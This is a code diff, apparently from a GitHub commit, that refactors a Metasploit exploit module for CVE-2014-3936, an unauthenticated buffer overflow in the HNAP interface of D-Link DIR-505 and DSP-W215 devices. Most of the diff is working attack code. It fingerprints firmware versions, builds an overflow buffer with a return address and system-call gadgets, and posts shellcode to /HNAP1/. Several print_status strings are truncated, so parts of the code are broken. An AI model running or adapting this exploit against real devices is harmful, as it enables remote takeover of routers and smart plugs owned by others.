@@ -15,31 +15,31 @@ def initialize(info = {})
1515 super ( update_info ( info ,
1616 'Name' => 'D-Link HNAP Buffer Overflow in POST Request' ,
1717 'Description' => %q{
18- This module exploits an anonymous remote code execution vulnerability on different D-Link devices.
19- This module has been successfully tested on D-Link DIR-505 in an emulated environment.
18+ This module exploits an anonymous remote code execution vulnerability on different
19+ D-Link devices. This module has been successfully tested on D-Link DIR-505 in an
20+ emulated environment.
2021 } ,
2122 'Author' =>
2223 [
23- 'Craig Heffner' , # vulnerability discovery and initial exploit
24- 'Michael Messner <devnull[at]s3cur1ty.de>' , # Metasploit module
24+ 'Craig Heffner' , # vulnerability discovery and initial exploit
25+ 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
2526 ] ,
2627 'License' => MSF_LICENSE ,
27- 'Platform' => [ 'linux' ] ,
28+ 'Platform' => 'linux' ,
2829 'Arch' => ARCH_MIPSBE ,
2930 'References' =>
3031 [
31- [ 'CVE' , '2014-3936' ] ,
32- [ 'BID' , '67651' ] ,
33- [ 'URL' , 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/' ] , # blog post from Craig including PoC
34- [ 'URL' , 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
32+ [ 'CVE' , '2014-3936' ] ,
33+ [ 'BID' , '67651' ] ,
34+ [ 'URL' , 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/' ] , # blog post from Craig including PoC
35+ [ 'URL' , 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
3536 ] ,
3637 'Targets' =>
3738 [
3839 #
3940 # Automatic targeting via fingerprinting
4041 #
4142 [ 'Automatic Targeting' , { 'auto' => true } ] ,
42-
4343 [ 'D-Link DSP-W215 - v1.0' ,
4444 {
4545 'Offset' => 1000000 ,
@@ -60,7 +60,9 @@ def initialize(info = {})
6060 ]
6161 ] ,
6262 'DisclosureDate' => 'May 15 2014' ,
63- 'DefaultTarget' => 0 ) )
63+ 'DefaultTarget' => 0 ) )
64+
65+ deregister_options ( 'CMDSTAGER::DECODER' , 'CMDSTAGER::FLAVOR' )
6466 end
6567
6668 def check
@@ -71,71 +73,38 @@ def check
7173 } )
7274
7375 if res && [ 200 , 301 , 302 ] . include? ( res . code )
74-
75- # trying to automatically detect a vulnerable device
76- if ( target [ 'auto' ] )
77- if res . body =~ /DIR-505/ && res . body =~ /1.07/
78-
79- self . targets . each do |t |
80- if ( t . name =~ /DIR-505.*1.07/ ) then
81- @mytarget = t
82- break
83- end
84- end
85-
86- elsif res . body =~ /DIR-505/ && res . body =~ /1.06/
87-
88- self . targets . each do |t |
89- if ( t . name =~ /DIR-505.*1.06/ ) then
90- @mytarget = t
91- break
92- end
93- end
94-
95- elsif res . body =~ /DSP-W215/ && res . body =~ /1.00/
96-
97- self . targets . each do |t |
98- if ( t . name =~ /DSP-W215.*1.00/ ) then
99- @mytarget = t
100- break
101- end
102- end
103-
104- else
105- # no supported device found
106- return Exploit ::CheckCode ::Unknown
107- end
108-
109- print_status ( "#{ peer } #{ @mytarget . name } )
110- print_good ( "#{ peer } )
111- return Exploit ::CheckCode ::Detected
112-
113- # not auto-targetting ... the user is responsible
76+ if res . body =~ /DIR-505/ && res . body =~ /1.07/
77+ @my_target = targets [ 3 ] if target [ 'auto' ]
78+ return Exploit ::CheckCode ::Appears
79+ elsif res . body =~ /DIR-505/ && res . body =~ /1.06/
80+ @my_target = targets [ 2 ] if target [ 'auto' ]
81+ return Exploit ::CheckCode ::Appears
82+ elsif res . body =~ /DSP-W215/ && res . body =~ /1.00/
83+ @my_target = targets [ 1 ] if target [ 'auto' ]
84+ return Exploit ::CheckCode ::Appears
11485 else
115- print_good ( "#{ peer } )
11686 return Exploit ::CheckCode ::Detected
11787 end
11888 end
11989 rescue ::Rex ::ConnectionError
120- return Exploit ::CheckCode ::Unknown
90+ return Exploit ::CheckCode ::Safe
12191 end
12292
12393 Exploit ::CheckCode ::Unknown
12494 end
12595
126- def target
127- return @mytarget if @mytarget
128- super
129- end
130-
13196 def exploit
13297 print_status ( "#{ peer } )
13398
134- # Use a copy of the target
135- @mytarget = target
99+ @my_target = target
100+ check_code = check
101+
102+ unless check_code == Exploit ::CheckCode ::Detected || check_code == Exploit ::CheckCode ::Appears
103+ fail_with ( Failure ::NoTarget , "#{ peer } )
104+ end
136105
137- unless check == Exploit :: CheckCode :: Detected
138- fail_with ( Failure ::Unknown , "#{ peer } a vulnerable device " )
106+ if @my_target . nil? || @my_target [ 'auto' ]
107+ fail_with ( Failure ::NoTarget , "#{ peer } auto detect, try setting a manual target... " )
139108 end
140109
141110 print_status ( "#{ peer } )
@@ -146,13 +115,13 @@ def exploit
146115 end
147116
148117 def prepare_shellcode ( cmd )
149- buf = rand_text_alpha_upper ( @mytarget [ 'Offset' ] ) # Stack filler
118+ buf = rand_text_alpha_upper ( @my_target [ 'Offset' ] ) # Stack filler
150119 buf << rand_text_alpha_upper ( 4 ) # $s0, don't care
151120 buf << rand_text_alpha_upper ( 4 ) # $s1, don't care
152121 buf << rand_text_alpha_upper ( 4 ) # $s2, don't care
153122 buf << rand_text_alpha_upper ( 4 ) # $s3, don't care
154123 buf << rand_text_alpha_upper ( 4 ) # $s4, don't care
155- buf << @mytarget [ 'Ret' ] # $ra
124+ buf << @my_target [ 'Ret' ] # $ra
156125
157126 # la $t9, system
158127 # la $s1, 0x440000
@@ -172,7 +141,7 @@ def execute_command(cmd, opts)
172141 'method' => 'POST' ,
173142 'uri' => "/HNAP1/" ,
174143 'encode_params' => false ,
175- 'data' => shellcode ,
144+ 'data' => shellcode
176145 } )
177146 return res
178147 rescue ::Rex ::ConnectionError
0 commit comments